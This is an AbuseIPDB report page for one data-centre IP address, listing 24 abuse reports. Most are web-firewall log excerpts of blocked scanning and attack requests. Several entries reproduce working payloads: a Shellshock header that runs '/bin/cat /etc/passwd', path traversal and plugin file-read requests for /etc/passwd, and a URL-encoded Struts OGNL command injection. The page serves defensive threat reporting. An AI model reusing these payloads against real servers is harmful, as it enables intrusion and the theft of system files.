JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 193.36.172.27

193.36.172.27 was found in our database!

This IP was reported 24 times. Confidence of Abuse is 0%: ?

ISP	trafficforce, UAB
Usage Type	Data Center/Web Hosting/Transit
ASN	AS264617
Domain Name	trafficforce.lt
Country	🇨🇭 Switzerland
City	Zurich, Zurich

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 193.36.172.27

Whois 193.36.172.27

IP Abuse Reports for 193.36.172.27:

This IP address has been reported a total of 24 times from 8 distinct sources. 193.36.172.27 was first reported on October 30th 2023, and the most recent report was 4 months ago.

Old Reports: The most recent abuse report for this IP address is from 4 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 TPI-Abuse	2026-01-17 08:04:15 (4 months ago)	(mod_security) mod_security (id:240950) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:240950) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jan 17 03:04:08.673033 2026] [security2:error] [pid 2307:tid 2307] [client 193.36.172.27:44181] ModSecurity: Access denied with code 403 (phase 1). Pattern match "\\\\D" at TX:1. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "4530"] [id "240950"] [rev "2"] [msg "COMODO WAF: XSS & SQL injection vulnerability in Pragyan CMS 3.0 (CVE-2015-1471)\|\|cpcalendars.nbcnewsradio.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "cpcalendars.nbcnewsradio.com"] [uri "/_users/org.couchdb.user:poc"] [unique_id "aWtCeIwyVWN4wb_aLmooTQAAABo"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-12-29 17:08:23 (5 months ago)	(mod_security) mod_security (id:210730) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210730) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 29 12:07:52.715692 2025] [security2:error] [pid 11149:tid 11262] [client 193.36.172.27:35119] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|www.kettlehill.com\|F\|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.kettlehill.com"] [uri "/moveitisapi/moveitisapi.dll"] [unique_id "aVK1aEE7nlDPjeB1K8nPRgAAAcE"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-11-13 08:55:49 (7 months ago)	(mod_security) mod_security (id:211190) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:211190) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 03:55:37.479980 2025] [security2:error] [pid 29041:tid 29041] [client 193.36.172.27:34057] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt\|\|ftp.nbcnewsradio.com\|F\|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "ftp.nbcnewsradio.com"] [uri "/"] [unique_id "aRWdCV0KfO8JciJZTqtZuQAAAAo"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-07-27 00:19:42 (10 months ago)	(mod_security) mod_security (id:211190) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:211190) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 26 20:19:36.321089 2025] [security2:error] [pid 172229:tid 172485] [client 193.36.172.27:59979] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt\|\|www.kettlehill.net\|F\|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.kettlehill.net"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "aIVwmOZd-uShJ73phjvvCQAAARQ"] show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2025-06-23 19:41:09 (11 months ago)	Ports: 2077,2078,2082,2083,2086,2087,2095,2096; Direction: 0; Trigger: LF_DISTATTACK	Brute-Force SSH
🇺🇸 TPI-Abuse	2025-05-29 18:58:00 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 29 14:57:42.663795 2025] [security2:error] [pid 3214482:tid 3214482] [client 193.36.172.27:57289] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.farmers123.com"] [uri "/.env.prod.local"] [unique_id "aDiuJsZfxVw7CKpuhJXYVwAAAAg"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2024-10-27 02:32:04 (1 year ago)	(mod_security) mod_security (id:221260) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:221260) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Oct 26 22:31:07.865770 2024] [security2:error] [pid 12084:tid 12229] [client 193.36.172.27:50311] [client 193.36.172.27] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)\|\|cpanel.kettlehill.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpanel.kettlehill.com"] [uri "/cgi-bin/test-cgi"] [unique_id "Zx2l6yG0MXpVxNrELXyzvgAAAQM"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2024-09-03 18:42:24 (1 year ago)	(mod_security) mod_security (id:210730) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210730) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 03 14:41:51.595348 2024] [security2:error] [pid 9131:tid 9131] [client 193.36.172.27:44215] [client 193.36.172.27] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "4"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|mail.stdavids-media.com\|F\|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "mail.stdavids-media.com"] [uri "/conf/nginx.conf"] [unique_id "ZtdYb1f9wjcel4c7XJuHhgAAAAA"] show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2024-08-22 20:02:42 (1 year ago)	193.36.172.27 - - [22/Aug/2024:22:02:42 +0200] "GET /?id=%25%7B%28%23instancemanager%3D%23applicatio ... show more 193.36.172.27 - - [22/Aug/2024:22:02:42 +0200] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28% ... show less	Hacking
🇩🇪 ps-center	2024-07-15 19:16:40 (1 year ago)	SS1: Web Attack POST /adminer.php	Web Spam Hacking Bad Web Bot Web App Attack
🇪🇸 10dencehispahard SL	2024-06-28 10:08:08 (1 year ago)	Unauthorized login attempts [ accesslogs]	Brute-Force
Anonymous	2024-06-27 19:04:41 (1 year ago)	Common attack or app scan event detected and blocked	Port Scan Hacking Web App Attack
🇪🇸 10dencehispahard SL	2024-05-08 07:00:43 (2 years ago)	Unauthorized login attempts []	Brute-Force
🇪🇸 10dencehispahard SL	2024-05-08 06:39:30 (2 years ago)	Web Attack	DDoS Attack Brute-Force Web App Attack
🇺🇸 TPI-Abuse	2024-05-01 10:37:41 (2 years ago)	(mod_security) mod_security (id:210492) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 193.36.172.27 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed May 01 06:37:30.637001 2024] [security2:error] [pid 27240:tid 46944977614592] [client 193.36.172.27:44177] [client 193.36.172.27] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autoconfig.kettlehill.net"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZjIbagWn9geulJ7mEbMYlQAAAQc"] show less	Brute-Force Bad Web Bot Web App Attack

Showing 1 to 15 of 24 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇷🇺 195.218.159.123

🇩🇪 167.172.187.11

🇺🇸 67.82.22.126

🇨🇦 66.85.30.4

🇬🇧 35.203.210.20

🇧🇷 35.199.103.44

🇳🇱 195.62.32.180

🇸🇬 194.164.107.4

🇩🇪 165.227.157.36

🇨🇳 118.196.38.83

🇨🇳 111.72.136.112

🇫🇷 85.217.140.48

🇦🇫 74.118.81.174

🇸🇬 68.183.191.143

🇬🇧 46.226.162.113

🇺🇸 45.73.142.179

🇨🇭 209.99.190.200

🇺🇸 198.24.175.82

🇲🇽 189.203.190.153

🇫🇮 130.49.8.239